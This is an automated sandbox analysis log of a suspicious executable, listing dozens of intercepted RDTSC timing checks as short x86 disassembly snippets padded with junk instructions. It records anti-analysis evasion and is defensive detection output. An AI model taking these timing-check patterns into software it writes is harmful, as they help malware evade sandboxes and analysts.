    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D59A0 second address: 9D59D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDDACAD5286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD5295h 0x00000012 jnl 00007FDDACAD5292h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA408 second address: 9DA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA40E second address: 9DA414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA414 second address: 9DA41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA41C second address: 9DA422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA422 second address: 9DA427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5A7 second address: 9DA5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5AB second address: 9DA5BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA864 second address: 9DA86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA86A second address: 9DA879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FDDACF47FDAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA9C9 second address: 9DA9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC17 second address: 9DDC34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC34 second address: 9DDC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Ah 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC42 second address: 9DDC4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC4B second address: 9DDC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD49D second address: 9DD4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29AF second address: 9E29B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29B5 second address: 9E29C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACF47FE2h 0x00000008 jne 00007FDDACF47FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29C5 second address: 9E29CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29CE second address: 9E29E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FDDACF47FFFh 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E29E2 second address: 9E2A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDDACAD5297h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2C9B second address: 9E2C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32C5 second address: 9E32CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32CF second address: 9E32E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E32E8 second address: 9E3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FDDACAD5292h 0x0000000b jmp 00007FDDACAD528Ch 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E363D second address: 9E3647 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E3647 second address: 9E3676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDDACAD5286h 0x00000009 jmp 00007FDDACAD528Fh 0x0000000e jmp 00007FDDACAD5295h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E44D6 second address: 9E44EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FDDACF47FDEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E44EA second address: 9E44F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E44F4 second address: 9E4500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007FDDACF47FD6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E4500 second address: 9E4504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E906A second address: 9E906E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8936 second address: 9E8963 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDDACAD5298h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDACAD528Fh 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8963 second address: 9E8968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8968 second address: 9E896E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8AB0 second address: 9E8AB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8AB5 second address: 9E8ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jno 00007FDDACAD5296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FDDACAD52A2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ED2EB second address: 9ED2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2FA3 second address: 9F2FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2FA7 second address: 9F2FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F30DF second address: 9F30FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FDDACAD528Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007FDDACAD5286h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F30FB second address: 9F3104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F33DE second address: 9F33FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5298h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F33FF second address: 9F3412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDDACF47FDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3412 second address: 9F3430 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDDACAD528Dh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007FDDACAD5286h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F358B second address: 9F358F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F358F second address: 9F3593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3593 second address: 9F35A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDDACF47FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FDDACF47FD6h 0x00000015 pop ebx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3E9E second address: 9F3EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3EA2 second address: 9F3EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3EA8 second address: 9F3EB7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDACAD528Ah 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4549 second address: 9F454F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F454F second address: 9F455B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F455B second address: 9F455F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2484 second address: 9F2488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2488 second address: 9F248E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F248E second address: 9F2492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2492 second address: 9F2496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA076 second address: 9FA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA07A second address: 9FA095 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDACF47FD6h 0x00000008 jng 00007FDDACF47FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDDACF47FDBh 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA095 second address: 9FA09B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD053 second address: 9FD06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FDDACF47FE0h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD06B second address: 9FD071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD071 second address: 9FD081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FD081 second address: 9FD0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FDDACAD5291h 0x0000000b jmp 00007FDDACAD528Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACAD5299h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FCAD0 second address: 9FCAD6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B543 second address: A0B547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B547 second address: A0B561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDACF47FE0h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0AF44 second address: A0AF53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FDDACAD5286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B0B5 second address: A0B0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FDDACF47FDAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FDDACF47FE4h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B0DF second address: A0B0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0B0E5 second address: A0B0FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDDACF47FD6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FDDACF47FD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12174 second address: A1217E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1217E second address: A12183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12183 second address: A1219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDDACAD5290h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A193EA second address: A193EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A193EE second address: A193F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A193F4 second address: A19403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FDDACF47FD6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AA63 second address: A1AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AA78 second address: A1AA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AA7C second address: A1AA8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FDDACAD528Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25D09 second address: A25D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDDACF47FD6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25D14 second address: A25D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Dh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24747 second address: A2474D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2474D second address: A24759 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24759 second address: A2475D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2475D second address: A24763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A249F4 second address: A24A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDDACF47FD6h 0x0000000a jmp 00007FDDACF47FE0h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edi 0x00000013 push esi 0x00000014 pushad 0x00000015 jmp 00007FDDACF47FE8h 0x0000001a jmp 00007FDDACF47FE0h 0x0000001f push eax 0x00000020 pop eax 0x00000021 jp 00007FDDACF47FD6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007FDDACF47FD6h 0x00000030 jno 00007FDDACF47FD6h 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24A53 second address: A24A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BBC second address: A24BD6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FDDACF47FD6h 0x0000000e jmp 00007FDDACF47FDCh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BD6 second address: A24BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24BE3 second address: A24BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24D97 second address: A24D9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25049 second address: A2505C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2505C second address: A25062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25062 second address: A25067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A25067 second address: A2506C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2506C second address: A2509C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FDDACF47FE3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDDACF47FDCh 0x00000015 push ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AB39 second address: A2AB3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2EAB0 second address: A2EAC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
